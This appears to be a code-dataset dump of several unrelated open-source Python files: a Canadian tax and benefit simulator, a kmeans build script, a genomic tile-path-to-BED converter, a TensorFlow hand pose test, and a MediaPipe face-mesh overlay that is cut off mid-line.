vrai si le calcul des cotisations sociales est demandé\n iass: boolean\n vrai si le calcul des prestations d'aide sociale est demandé\n \"\"\"\n def __init__(self, year, ifed=True, ioas=True, iprov=True,\n ipayroll=True, iass=True):\n self.year = year\n self.ifed = ifed\n self.iprov = iprov\n self.ipayroll = ipayroll\n self.ioas = ioas\n self.iass = iass\n\n if ipayroll:\n self.payroll = payroll(year)\n if year == 2020 or year == 2021:\n self.covid = covid.program(year)\n 
self.ei = ei.program(year)\n        if ifed:\n            self.federal = federal.form(year)\n        if iprov:\n            self.prov = {'qc': quebec.form(year),\n                         'on': ontario.form(year)}\n        if ioas:\n            self.oas = oas.program(year, self.federal)\n        if iass:\n            self.ass = assistance.program(year)\n\n    def compute(self, hh, n_points=1):\n        \"\"\"\n        This function transfers pension income between eligible spouses\n        and keeps the solution that maximizes the household's disposable income.\n        If n_points=0, no pension income splitting is performed. By default\n        (n_points=1), gross incomes are equalized to the extent that transfers\n        allow. For n>1, a simulation is run for each point of the grid.\n        Note that as n increases, the solutions for smaller n (in particular n=0)\n        are also considered.\n\n        Parameters\n        ----------\n        hh: Hhold\n            instance of the Hhold class\n        n_points: int\n            number of points used to optimize the splitting of pension\n            income\n        \"\"\"\n        if not hh.elig_split or (n_points == 0):\n            self.compute_all(hh)\n            return hh\n\n        hh.copy()\n        self.compute_all(hh)\n\n        if hh.elig_split and n_points > 0:\n            fam_disp_inc_max, transfer_max = hh.fam_disp_inc, 0\n\n            desired_transfer = (hh.sp[0].inc_tot - hh.sp[1].inc_tot) / 2\n            transfer = np.clip(desired_transfer, - hh.sp[1].max_split,\n                               hh.sp[0].max_split)\n            self.compute_with_transfer(hh, transfer)\n\n            if hh.fam_disp_inc > fam_disp_inc_max:\n                fam_disp_inc_max, transfer_max = hh.fam_disp_inc, transfer\n\n            if n_points > 1:\n                grid_transfers = np.linspace(hh.sp[1].max_split,\n                                             hh.sp[0].max_split, n_points-1)\n                for transfer in grid_transfers:\n                    self.compute_with_transfer(hh, transfer)\n                    if hh.fam_disp_inc > fam_disp_inc_max:\n                        fam_disp_inc_max, transfer_max = hh.fam_disp_inc, transfer\n\n            if transfer != transfer_max:\n                self.compute_with_transfer(hh, transfer_max)\n        return hh\n\n
    def compute_with_transfer(self, hh, transfer):\n        \"\"\"\n        This function carries out the pension income transfers and calls\n        the function that simulates the household.\n\n        Parameters\n        ----------\n        hh: Hhold\n            instance of the Hhold class\n        transfer: float\n            transfer from the first to the second spouse (from the second to the first if negative)\n        \"\"\"\n        hh.reset()\n        p0, p1 = hh.sp[0], hh.sp[1]\n        if transfer < 0:\n            p0.pension_split = - transfer\n            p1.pension_deduction = - transfer\n            if p1.age >= 65:\n                p0.pension_split_qc = p0.pension_split\n                p1.pension_deduction_qc = p1.pension_deduction\n        else:\n            p1.pension_split = transfer\n            p0.pension_deduction = transfer\n            if p0.age >= 65:\n                p1.pension_split_qc = p1.pension_split\n                p0.pension_deduction_qc = p0.pension_deduction\n\n        self.compute_all(hh)\n\n    def compute_all(self, hh):\n        \"\"\"\n        Computes all of the requested components.\n\n        Parameters\n        ----------\n        hh: Hhold\n            instance of the Hhold class\n        \"\"\"\n        if self.ipayroll:\n            self.compute_payroll(hh)  # put payroll before oas\n        if self.year == 2020 or self.year == 2021:\n            self.compute_covid(hh)\n            self.compute_ei(hh)\n        if self.ioas:\n            self.compute_oas(hh)\n        if self.ifed:\n            self.compute_fed(hh)\n        if self.iprov:\n            self.compute_prov(hh)\n        if self.iass:\n            self.compute_sa(hh)\n        self.disp_inc(hh)\n\n    def compute_oas(self, hh):\n        \"\"\"\n        Computes Old Age Security (OAS), Guaranteed Income Supplement (GIS), Allowance and Allowance for the Survivor benefits.\n\n        Parameters\n        ----------\n        hh: Hhold\n            instance of the Hhold class\n        \"\"\"\n        self.oas.file(hh)\n\n    def compute_fed(self, hh):\n        \"\"\"\n        Computes federal income tax.\n\n        Parameters\n        ----------\n        hh: Hhold\n            instance of the Hhold class\n        \"\"\"\n        self.federal.file(hh)\n\n    def compute_prov(self, hh):\n        \"\"\"\n        Computes provincial income tax.\n\n        Parameters\n        ----------\n        hh: Hhold\n            instance of the Hhold class\n        \"\"\"\n        self.prov[hh.prov].file(hh)\n\n
    def compute_payroll(self, hh):\n        \"\"\"\n        Computes payroll contributions.\n\n        Parameters\n        ----------\n        hh: Hhold\n            instance of the Hhold class\n        \"\"\"\n        self.payroll.compute(hh)\n\n    def compute_covid(self, hh):\n        \"\"\"\n        Computes the CERB, CRB, CESB and IPREW benefits.\n\n        Parameters\n        ----------\n        hh: Hhold\n            instance of the Hhold class\n        \"\"\"\n        self.covid.compute(hh)\n\n    def compute_ei(self, hh):\n        \"\"\"\n        Computes the Employment Insurance benefits that would replace the CERB (counterfactual).\n\n        Parameters\n        ----------\n        hh: Hhold\n            instance of the Hhold class\n        \"\"\"\n        for p in hh.sp:\n            self.ei.compute_benefits_covid(p, hh)\n\n    def compute_sa(self, hh):\n        \"\"\"\n        Computes social assistance benefits.\n\n        Parameters\n        ----------\n        hh: Hhold\n            instance of the Hhold class\n        \"\"\"\n        self.ass.file(hh)\n\n
    def compute_after_tax_inc(self, hh):\n        \"\"\"\n        Computes income after federal and provincial taxes.\n\n        Computed at the individual level and attached to the person; the household-level result is also available.\n\n        Parameters\n        ----------\n        hh: Hhold\n            instance of the Hhold class\n        \"\"\"\n        for p in hh.sp:\n            after_tax_inc = p.inc_tot\n            if self.ifed:\n                after_tax_inc -= p.fed_return['net_tax_liability']\n            if self.iprov:\n                after_tax_inc -= p.prov_return['net_tax_liability']\n            p.after_tax_inc = after_tax_inc\n\n    def disp_inc(self, hh):\n        \"\"\"\n        Computes disposable income after taxes, payroll contributions, savings (positive or negative) and benefits.\n\n        Computed at the individual level and attached to the person; the household-level result is also available.\n\n        Parameters\n        ----------\n        hh: Hhold\n            instance of the Hhold class\n        \"\"\"\n        self.compute_after_tax_inc(hh)\n        for p in hh.sp:\n            disp_inc = p.after_tax_inc\n            if self.ipayroll:\n                disp_inc -= sum(list(p.payroll.values()))\n            if self.iass:\n                disp_inc += p.inc_sa\n            disp_inc -= p.con_rrsp + p.con_non_rrsp\n            p.disp_inc = disp_inc\n\n\n
class incentives:\n    def __init__(self, case_mode=True, year=2020, data_file=None,\n                 multiprocessing=True):\n        self.case_mode = case_mode\n        self.year = year\n        self.set_wages()\n        self.set_cases()\n        if case_mode:\n            self.init_hh()\n        else:\n            self.load_hh(data_file)\n        self.set_hours()\n        self.set_covid()\n        self.set_tax_system()\n        self.multiprocessing = multiprocessing\n\n    def set_cases(self, icouple=True, isp_work=True, ikids=True,\n                  iessential=True, insch=True, wages=np.linspace(1, 5, 10)):\n        self.icouple = icouple\n        self.isp_work = isp_work\n        self.ikids = ikids\n        self.iessential = iessential\n        self.insch = insch\n        self.wages = wages\n        l_index = []\n        if self.icouple:\n            l_index.append(['single', 'couple'])\n            if self.isp_work:\n                l_index.append([True, False])\n            else:\n                l_index.append([False])\n        else:\n            # for couple\n            l_index.append(['single'])\n            # for sp_work\n            l_index.append([False])\n        if self.ikids:\n            l_index.append([0, 1, 2])\n        else:\n            l_index.append([0])\n        if self.iessential:\n            l_index.append([True, False])\n        else:\n            l_index.append([False])\n        if self.insch:\n            l_index.append([True, False])\n        else:\n            l_index.append([False])\n        l_index.append(wages)\n        cases = list(product(*l_index))\n        cases = pd.DataFrame(index=pd.MultiIndex.from_tuples(cases))\n        cases.index.names = ['couple', 'sp_work', 'nkids', 'essential',\n                             'student', 'wage_multiple']\n        to_drop = (cases.index.get_level_values(0)=='single') & (cases.index.get_level_values('sp_work')==True)\n        cases = cases.loc[to_drop==False, :]\n        self.cases = cases\n\n
    def set_hours(self, nh=51, maxh=50, dh=10, weeks_per_year=52.1,\n                  hours_full=40):\n        self.nh = nh\n        self.maxh = maxh\n        self.gridh = np.linspace(0, self.maxh, self.nh)\n        self.dh = dh\n        self.weeks_per_year = weeks_per_year\n        self.hours_full = hours_full\n\n    def set_covid(self, months_pre=3, months_covid=4):\n        self.months_pre = months_pre\n        self.months_covid = months_covid\n        self.months_post = 12 - months_pre - months_covid\n        self.share_covid = months_covid * 4 / self.weeks_per_year\n        self.share_pre = self.months_pre * 4 / self.weeks_per_year\n        self.share_post = self.months_post * 4 / self.weeks_per_year\n\n    def set_wages(self, minwage=13.1, avgwage=25.0):\n        self.minwage = minwage\n        self.avgwage = avgwage\n\n    def set_tax_system(self, tax_system=None):\n        if tax_system is not None:\n            self.tax_system = tax_system\n        else:\n            self.tax_system = tax(self.year, iass=False)\n\n    def init_hh(self):\n        self.cases['hhold'] = None\n        for i in self.cases.index:\n            p = Person(age=45, essential_worker=i[3], student=i[4])\n            hh = Hhold(p, prov='qc')\n            if i[0] == 'couple':\n                if i[1]:\n                    sp_earn = self.avgwage * self.hours_full * 52.1\n                else:\n                    sp_earn = 0.0\n                sp = Person(age=45, earn=sp_earn)\n                hh.sp.append(sp)\n            if i[2] > 0:\n                for k in range(i[2]):\n                    d = Dependent(age=3)\n                    hh.dep.append(d)\n            self.cases.loc[i, 'hhold'] = hh\n\n
    def load_hh(self, file):\n        if isinstance(file, pd.DataFrame):\n            self.cases = file\n        else:\n            self.cases = pd.read_pickle(file)\n        self.cases['couple'] = np.where(self.cases['couple'], 'couple', 'single')\n        self.cases['sp_work'] = self.cases['s_inc_earn'] > 0\n        self.cases['nkids'] = np.where(self.cases['n_kids']>2, 2, self.cases['n_kids'])\n        self.cases['essential'] = self.cases['r_essential_worker']\n        self.cases['student'] = self.cases['r_student']\n        self.cases['wage_multiple'] = self.cases['r_wage']/self.minwage\n        self.cases['r_hours_worked_week'] = self.cases['r_hours_worked'] / 50\n        self.cases['s_hours_worked_week'] = self.cases['s_hours_worked'] / 50\n        self.cases = self.cases.set_index(['couple', 'sp_work', 'nkids',\n                                           'essential', 'student',\n                                           'wage_multiple'])\n\n    def map_dispinc(self, row):\n        \"\"\"\n        Maps the attributes onto the households\n        \"\"\"\n        hours_pre = [row['hours_pre'] / self.months_pre] * self.months_pre\n        hours_covid = [row['hours_covid'] / self.months_covid] * self.months_covid\n        earn_pre = [row['earn_pre'] / self.months_pre] * self.months_pre\n        earn_covid = [row['earn_covid'] / self.months_covid] * self.months_covid\n        if self.months_post > 0:\n            hours_post = [row['hours_post'] / self.months_post] * self.months_post\n            earn_post = [row['earn_post'] / self.months_post] * self.months_post\n            row['hhold'].sp[0].hours_month = hours_pre + hours_covid + hours_post\n            row['hhold'].sp[0].inc_earn = earn_pre + earn_covid + earn_post\n            row['hhold'].sp[0].inc_self_earn = earn_pre + earn_covid + earn_post\n        else:\n            row['hhold'].sp[0].inc_earn = earn_pre + earn_covid\n        row['hhold'].sp[0].attach_inc_work_month(row['hhold'].sp[0].inc_earn,\n                                                 [0] * 12)  # hourly wage based on earn and self_earn mapped into inc_earn\n        if row['hhold'].sp[0].student:\n            row['hhold'].sp[0].months_cesb = self.months_covid\n        else:\n            row['hhold'].sp[0].months_cerb = self.months_covid\n        self.tax_system.compute(row['hhold'])\n        self.tax_system.disp_inc(row['hhold'])\n        return row['hhold'].fam_disp_inc\n\n    def set_track_fed(self, attributes=[]):\n        \"\"\" Function that extracts items from the federal tax return\n\n        Keyword 
Arguments:\n attributes {list} -- liste des attributs (default: {[]})\n \"\"\"\n self.fed_track = attributes\n\n def set_track_prov(self, attributes=[]):\n \"\"\" Fonction qu permet de sortir des éléments du rapport d'impôt du Québec\n\n Keyword Arguments:\n attributes {list} -- liste des attributs (default: {[]})\n \"\"\"\n self.prov_track = attributes\n\n def map_chunk(self, df):\n return df.apply(self.map_dispinc,axis=1)\n\n def get_dispinc(self,h,ifed=False,iprov=False):\n results = self.cases.copy()\n results['wage'] = self.minwage * np.array(results.index.get_level_values('wage_multiple'))\n if self.case_mode:\n results['hours_pre'] = self.hours_full * self.weeks_per_year * self.share_pre\n results['hours_post'] = self.hours_full * self.weeks_per_year * self.share_pre\n else:\n results['hours_pre'] = results['r_hours_worked_week'] * self.weeks_per_year * self.share_pre\n results['hours_post'] = results['r_hours_worked_week'] *self.weeks_per_year * self.share_post\n results['earn_pre'] = results['hours_pre'] * results['wage']\n results['earn_post'] = results['hours_post'] * results['wage']\n results['hours_covid'] = h * self.weeks_per_year * self.share_covid\n results['earn_covid'] = results['hours_covid'] * results['wage']\n results['earn'] = results['earn_pre'] + results['earn_covid'] + results['earn_post']\n if self.multiprocessing:\n nchunks = cpu_count()\n chunks = np.array_split(results,nchunks)\n p = Pool(nchunks)\n results['dispinc'] = pd.concat(p.map(self.map_chunk,chunks))\n p.close()\n p.join()\n else:\n results['dispinc'] = results.apply(self.map_dispinc, axis=1)\n if ifed:\n for attr in self.fed_track:\n results['fed_'+attr] = [hh.sp[0].fed_return[attr] for hh in results['hhold']]\n if iprov:\n for attr in self.prov_track:\n results['prov_'+attr] = [hh.sp[0].prov_return[attr] for hh in results['hhold']]\n return results\n\n def get_one_emtr(self, h):\n work_base = self.get_dispinc(h)\n work_more = self.get_dispinc(h+self.dh)\n temi = 1.0 - (work_more['dispinc'] - work_base['dispinc'])/(work_more['earn'] - work_base['earn'])\n return temi\n\n def get_one_ptr(self, h):\n work_base = self.get_dispinc(0)\n work_more = self.get_dispinc(h)\n tepi = 1.0 - (work_more['dispinc'] - work_base['dispinc'])/(work_more['earn'] - work_base['earn'])\n return tepi\n\n def emtr(self):\n results = self.cases.copy()\n for h in self.gridh:\n results['temi_'+str(int(h))] = self.get_one_emtr(h)\n return results\n\n def ptr(self):\n results = self.cases.copy()\n for h in self.gridh[1:]:\n results['tepi_'+str(int(h))] = self.get_one_ptr(h)\n return results\n\n def dispinc(self):\n results = self.cases.copy()\n for h in self.gridh:\n res = self.get_dispinc(h)\n results['dispinc_'+str(int(h))] = res['dispinc']\n return results\n\n def compute_emtr_ptr_dispinc(self):\n for h in self.gridh:\n self.cases['temi_'+str(int(h))] = self.get_one_emtr(h)\n for h in self.gridh[1:]:\n self.cases['tepi_'+str(int(h))] = self.get_one_ptr(h)\n for h in self.gridh:\n res = self.get_dispinc(h)\n self.cases['dispinc_'+str(int(h))] = res['dispinc']\n","repo_name":"CREEi-models/srd","sub_path":"srd/calculators.py","file_name":"calculators.py","file_ext":"py","file_size_in_byte":18159,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"33437814308","text":"from distutils.core import setup, Extension\nimport numpy\n\npykmeans = Extension(\n 'pykmeans',\n sources=['pykmeans.c'],\n library_dirs=['/mnt/software/intel/composer_xe_2013.4.183/mkl/lib/intel64'],\n 
libraries=['mkl_rt', 'mkl_intel_ilp64', 'mkl_gnu_thread', 'mkl_core', 'dl', 'pthread', 'm', 'gomp'],\n extra_compile_args=['-fopenmp', '-g', '-DMKL_ILP64', '-m64', '-O3'],\n include_dirs=[numpy.get_include(), '.', '/mnt/software/intel/composer_xe_2013.4.183/mkl/include'],\n)\n\nsetup(\n name='pykmeans',\n version='0.1',\n description='A fast and simple main-memory kmeans implementation using OpenMP and blas.',\n ext_modules=[pykmeans],\n)\n","repo_name":"danielhauagge/pykmeans","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"74499305362","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\nimport collections\nimport subprocess\nimport os\nimport argparse\nimport re\n\nPathInfo = collections.namedtuple(\"PathInfo\", [\"chrom\", \"firstend\", \"lastend\"])\n\ndef get_pathinfo(path, assembly, assemblyindextext):\n \"\"\"Geth PathInfo of a path from the assembly\"\"\"\n pattern = r'.*:{}\\t.*'.format(path)\n match = re.search(pattern, assemblyindextext)\n if match:\n indexline = match.group()\n else:\n raise Exception(\"No such path as {}\".format(path))\n fields = indexline.split('\\t')\n chrom = fields[0].split(':')[1]\n length = fields[1]\n offset = fields[2]\n pathassembly = subprocess.check_output([\"bgzip\", \"-b\", offset, \"-s\", length, assembly]).strip()\n assemblylines = pathassembly.split('\\n')\n firstend = int(assemblylines[0].split('\\t')[1])\n lastend = int(assemblylines[-1].split('\\t')[1])\n return PathInfo(chrom, firstend, lastend)\n\ndef make_bed_path(path, assembly):\n \"\"\"Make the bed file of a path\"\"\"\n assemblyindex = os.path.splitext(assembly)[0] + \".fwi\"\n with open(assemblyindex) as f:\n assemblyindextext = f.read()\n pathinfo = get_pathinfo(path, assembly, assemblyindextext)\n if path == \"0000\":\n start = 0\n else:\n previous_path = format(int(path, 16) - 1, '04x')\n previous_pathinfo = get_pathinfo(previous_path, assembly, assemblyindextext)\n while (previous_pathinfo.lastend >= pathinfo.firstend and previous_pathinfo.chrom == pathinfo.chrom):\n previous_path = format(int(previous_path, 16) - 1, '04x')\n previous_pathinfo = get_pathinfo(previous_path, assembly, assemblyindextext)\n else:\n if previous_pathinfo.chrom != pathinfo.chrom:\n start = 0\n else:\n start = previous_pathinfo.lastend\n print(\"{}\\t{}\\t{}\".format(pathinfo.chrom, start, pathinfo.lastend))\n\ndef make_bed_steps(path, stepsfile, assembly):\n \"\"\"Make the bed file of a list of steps in a path\"\"\"\n assemblyindex = os.path.splitext(assembly)[0] + \".fwi\"\n with open(assemblyindex) as f:\n assemblyindextext = f.read()\n pattern = r'.*:{}\\t.*'.format(path)\n match = re.search(pattern, assemblyindextext)\n if match:\n indexline = match.group()\n else:\n raise Exception(\"No such path as {}\".format(path))\n fields = indexline.split('\\t')\n chrom = fields[0].split(':')[1]\n length = fields[1]\n offset = fields[2]\n pathassembly = subprocess.check_output([\"bgzip\", \"-b\", offset, \"-s\", length, assembly]).strip()\n assemblylines = pathassembly.split('\\n')\n\n with open(stepsfile) as f:\n for line in f:\n linestrip = line.strip()\n step = linestrip.split('+')[0]\n span = int(linestrip.split('+')[1], 16)\n spanningtile_step = format(int(step, 16) + span - 1, '04x')\n pattern = re.compile(r'^{}\\t.*'.format(spanningtile_step), re.MULTILINE)\n match = re.search(pattern, pathassembly)\n if match:\n end = 
int(match.group().split('\\t')[1].strip())\n else:\n raise Exception(\"No such step as {} with span {} in path {}\".format(step, span, path))\n\n # calculate previous tile to derive start position\n # calculate previous tile when the step is not the first one in the path\n if step != \"0000\":\n previous_step = format(int(step, 16) - 1, '04x')\n previous_pattern = re.compile(r'^{}\\t.*'.format(previous_step), re.MULTILINE)\n previous_match = re.search(previous_pattern, pathassembly)\n start = int(previous_match.group().split('\\t')[1].strip())\n elif path == \"0000\":\n start = 0\n # calculate previous tile when the step is the first one in the path\n else:\n previous_path = format(int(path, 16) - 1, '04x')\n previous_pathinfo = get_pathinfo(previous_path, assembly, assemblyindextext)\n while (previous_pathinfo.lastend >= end and previous_pathinfo.chrom == chrom):\n previous_path = format(int(previous_path, 16) - 1, '04x')\n previous_pathinfo = get_pathinfo(previous_path, assembly, assemblyindextext)\n else:\n if previous_pathinfo.chrom != chrom:\n start = 0\n else:\n start = previous_pathinfo.lastend\n print(\"{}\\t{}\\t{}\".format(chrom, start, end))\n\ndef main():\n parser = argparse.ArgumentParser(description='Output the bed file\\\n of a path, or a sub-region of a path.')\n parser.add_argument('path', metavar='PATH', help='tile path')\n parser.add_argument('assembly', metavar='ASSEMBLY', help='assembly file')\n\n parser.add_argument('--stepsfile', help='steps file indicating a sub-region\\\n of a path, each line in the form of \"step+span\"')\n\n args = parser.parse_args()\n if args.stepsfile:\n make_bed_steps(args.path, args.stepsfile, args.assembly)\n else:\n make_bed_path(args.path, args.assembly)\n\nif __name__ == '__main__':\n main()\n","repo_name":"arvados/l7g","sub_path":"tools/cgf2vcf/steps2bed.py","file_name":"steps2bed.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"36223301321","text":"#\n# Test for PoseNet\n#\n\nfrom __future__ import print_function, unicode_literals\n\nimport tensorflow as tf\nimport numpy as np\nimport scipy.misc\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\nfrom nets.network import PoseEstimationNetwork\nfrom utils.general import *\n\n# snapshots file path\nPATH_TO_HANDSEGNET_SNAPSHOTS = './snapshots_handsegnet/' \nPATH_TO_POSENET_SNAPSHOTS = './snapshots_posenet/' \n\nif __name__ == '__main__':\n # images to be shown\n image_list = list()\n image_list.append('./data/6.png')\n image_list.append('./data/2.png')\n image_list.append('./data/3.png')\n image_list.append('./data/4.png')\n image_list.append('./data/5.png')\n\n # network input\n image_tf = tf.placeholder(tf.float32, shape=(1, 240, 320, 3))\n\n # build network\n net = PoseEstimationNetwork()\n hand_scoremap_tf, image_crop_tf, scale_crop_tf, center_tf = net.HandSegCrop(image_tf)\n \n # detect keypoints in 2D\n s = image_crop_tf.get_shape().as_list()\n keypoints_scoremap_tf = net.PoseNet(image_crop_tf)\n keypoints_scoremap_tf = keypoints_scoremap_tf[-1]\n keypoints_scoremap_tf = tf.image.resize_images(keypoints_scoremap_tf, (s[1], s[2]))\n\n # Start TF\n gpu_options = tf.GPUOptions(per_process_gpu_memory_fraction=0.8)\n sess = tf.Session(config=tf.ConfigProto(gpu_options=gpu_options))\n\n # Load CheckPoint files \n last_cpt = tf.train.latest_checkpoint(PATH_TO_HANDSEGNET_SNAPSHOTS)\n assert last_cpt is not None, \"Could not locate snapshot to load. 
Did you already train the network and set the path accordingly?\"\n load_weights_from_snapshot(sess, last_cpt, discard_list=['Adam', 'global_step', 'beta'])\n\n last_cpt = tf.train.latest_checkpoint(PATH_TO_POSENET_SNAPSHOTS)\n assert last_cpt is not None, \"Could not locate snapshot to load. Did you already train the network and set the path accordingly?\"\n load_weights_from_snapshot(sess, last_cpt, discard_list=['Adam', 'global_step', 'beta'])\n\n # OR load weights used in the paper\n # net.init(sess, weight_files=['./weights/handsegnet-rhd.pickle',\n # './weights/posenet-rhd-stb.pickle'], exclude_var_list=['PosePrior', 'ViewpointNet'])\n\n \n # Feed image list through network\n for img_name in image_list:\n image_raw = scipy.misc.imread(img_name)\n image_raw = scipy.misc.imresize(image_raw, (240, 320))\n image_v = np.expand_dims((image_raw.astype('float') / 255.0) - 0.5, 0)\n\n hand_scoremap_v, image_crop_v, scale_v, center_v,\\\n keypoints_scoremap_v = sess.run([hand_scoremap_tf, image_crop_tf, scale_crop_tf, center_tf,keypoints_scoremap_tf],\n feed_dict={image_tf: image_v})\n \n hand_scoremap_v = np.squeeze(hand_scoremap_v)\n image_crop_v = np.squeeze(image_crop_v)\n keypoints_scoremap_v = np.squeeze(keypoints_scoremap_v)\n\n # post processing\n image_crop_v = ((image_crop_v + 0.5) * 255).astype('uint8')\n coord_hw_crop = detect_keypoints(np.squeeze(keypoints_scoremap_v))\n coord_hw = trafo_coords(coord_hw_crop, center_v, scale_v, 256)\n\n # visualize\n fig = plt.figure(1)\n ax1 = fig.add_subplot(221)\n ax2 = fig.add_subplot(222)\n ax3 = fig.add_subplot(223)\n ax1.imshow(image_raw)\n plot_hand(coord_hw, ax1)\n ax2.imshow(image_crop_v)\n plot_hand(coord_hw_crop, ax2)\n ax3.imshow(np.argmax(hand_scoremap_v, 2))\n plt.show()\n","repo_name":"Julia0524/Image-Processing-Project","sub_path":"test_posenet.py","file_name":"test_posenet.py","file_ext":"py","file_size_in_byte":3523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"72895123922","text":"import mediapipe as mp\nimport cv2\nimport numpy as np\nfrom tkinter import Tk, Canvas, PhotoImage, NW, Button\nfrom PIL import Image, ImageTk\nfrom ctypes import windll\n\n#loomie\n#cap = cv2.VideoCapture(0)\n#cap = cv2.VideoCapture(3) # caso demore para abrir sua camera, teste esse\ncap = cv2.VideoCapture(3, cv2.CAP_DSHOW) # caso demore para abrir sua camera, teste esse\n\nface_mesh = mp.solutions.face_mesh\nmp_drawing = mp.solutions.drawing_utils\nmp_drawing_styles = mp.solutions.drawing_styles\n\ndef achar_pontos(pontos_da_parte):\n parte = []\n for point in pontos_da_parte:\n ponto_percentual = face_landmarks.landmark[point]\n y, x, z = frame.shape\n\n ponto_x = int(x * ponto_percentual.x)\n ponto_y = int(y * ponto_percentual.y)\n\n parte.append([ponto_x, ponto_y])\n return parte\n\nface = face_mesh.FaceMesh(static_image_mode=True,\n max_num_faces=1,\n refine_landmarks=True,\n min_detection_confidence=0.5)\n\nif not cap.isOpened():\n print(\"nao abriu\")\n exit()\n\n## opcional: codigo para tirar a barra sem remover o icone\nGWL_EXSTYLE=-20\nWS_EX_APPWINDOW=0x00040000\nWS_EX_TOOLWINDOW=0x00000080\n\ndef set_appwindow(root):\n hwnd = windll.user32.GetParent(root.winfo_id())\n style = windll.user32.GetWindowLongW(hwnd, GWL_EXSTYLE)\n style = style & ~WS_EX_TOOLWINDOW\n style = style | WS_EX_APPWINDOW\n windll.user32.SetWindowLongW(hwnd, GWL_EXSTYLE, style)\n root.wm_withdraw()\n root.after(3000, lambda: root.wm_deiconify())\n\nrodando = True\n\ndef desligar(event):\n global rodando\n 
rodando = False\n\nlastClickX = 0\nlastClickY = 0\ndef SaveLastClickPos(event):\n global lastClickX, lastClickY\n lastClickX = event.x\n lastClickY = event.y\n\n\ndef Dragging(event):\n x, y = event.x - lastClickX + root.winfo_x(), event.y - lastClickY + root.winfo_y()\n root.geometry(\"+%s+%s\" % (x , y))\n\nroot = Tk()\nroot.title('Jarvis')\nroot.attributes('-transparentcolor','#f0f0f0')\ncanvas = Canvas(root, width=800, height=600)\ncanvas.pack()\n\nsem_borda = True\nif sem_borda:\n root.overrideredirect(True) # remove a barra\n root.after(500, lambda: set_appwindow(root))\n\nroot.bind('', SaveLastClickPos)\nroot.bind('', Dragging)\nroot.bind(\"\", desligar)\n\nimage_init = np.zeros((800, 600, 3), np.uint8)\nimage_init_tk = ImageTk.PhotoImage(image=Image.fromarray(image_init))\npose_container = canvas.create_image(0, 0, anchor=NW, image=image_init_tk)\n\nwindowName = \"Imagem Mil Grau\"\n\nwhile rodando:\n ret, frame = cap.read()\n\n if not ret:\n print(\"nao tem frame\")\n break\n\n frame_shape = frame.shape\n image = np.zeros((frame_shape[0], frame_shape[1], 3), np.uint8)\n\n results = face.process(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))\n\n if results.multi_face_landmarks:\n for face_landmarks in results.multi_face_landmarks:\n mouth_points_1 = [61, 146, 91, 181, 84, 17, 314, 405, 321, 375, 291] # labio baixo\n mouth_points_2 = [61, 185, 40, 39, 37, 0, 267, 269, 270, 409, 291] # labio cima\n mouth_points_3 = [78, 95, 88, 178, 87, 14, 317, 402, 318, 324, 308] # labio interno baixo\n mouth_points_4 = [78, 191, 80, 81, 82, 13, 312, 311, 310, 415, 308] # labio interno cima\n\n iris_left = [474, 475, 476, 477]\n iris_right = [469, 470, 471, 472]\n\n nose_points_1 = [168, 6, 197, 195, 5, 4, 1, 19, 94, 2]\n nose_points_2 = [98, 97, 2, 326, 327, 294, 278, 344, 440, 275, 4, 45, 220, 115, 48, 64, 98]\n\n face_oval_points = [10, 338, 297, 332, 284, 251, 389, 356, 454, 323, 361, 288,\n 397, 365, 379, 378, 400, 377, 152, 148, 176, 149,\n 150, 136, 172, 58, 132, 93, 234, 127, 162, 21, 54,\n 103, 67, 109, 10]\n\n boca_points = mouth_points_1 + mouth_points_2[::-1]\n boca_points_up = mouth_points_2 + mouth_points_4[::-1]\n boca_points_down = mouth_points_1 + mouth_points_3[::-1]\n iris_points_left = iris_left\n\n boca = achar_pontos(boca_points)\n boca_u = achar_pontos(boca_points_up)\n boca_d = achar_pontos(boca_points_down)\n iris_l = achar_pontos(iris_left)\n iris_r = achar_pontos(iris_right)\n nose1 = achar_pontos(nose_points_1)\n nose2 = achar_pontos(nose_points_2)\n face_oval = achar_pontos(face_oval_points)\n\n for point in boca_points:\n ponto_percentual = face_landmarks.landmark[point]\n y, x, z = frame.shape\n\n ponto_x = int(x * ponto_percentual.x)\n ponto_y = int(y * ponto_percentual.y)\n\n #boca.append([ponto_x, ponto_y])\n\n frame = cv2.circle(frame, (ponto_x, ponto_y), 1, (255, 0, 0), 3)\n\n # desenhar rosto todo\n rosto_todo = True\n if rosto_todo:\n\n mp_drawing.draw_landmarks(\n image=frame,\n landmark_list=face_landmarks,\n connections= face_mesh.FACEMESH_TESSELATION,\n connection_drawing_spec=mp_drawing_styles.get_default_face_mesh_tesselation_style(),\n landmark_drawing_spec=None)\n\n mp_drawing.draw_landmarks(\n image=frame,\n landmark_list=face_landmarks,\n connections=face_mesh.FACEMESH_CONTOURS,\n connection_drawing_spec=mp_drawing_styles.get_default_face_mesh_contours_style(),\n landmark_drawing_spec=None)\n\n cv2.fillPoly(image, pts=np.array([face_oval]), color=(255, 255, 255))\n cv2.fillPoly(image, pts=np.array([boca]), color=(255, 0, 0))\n cv2.fillPoly(image, 
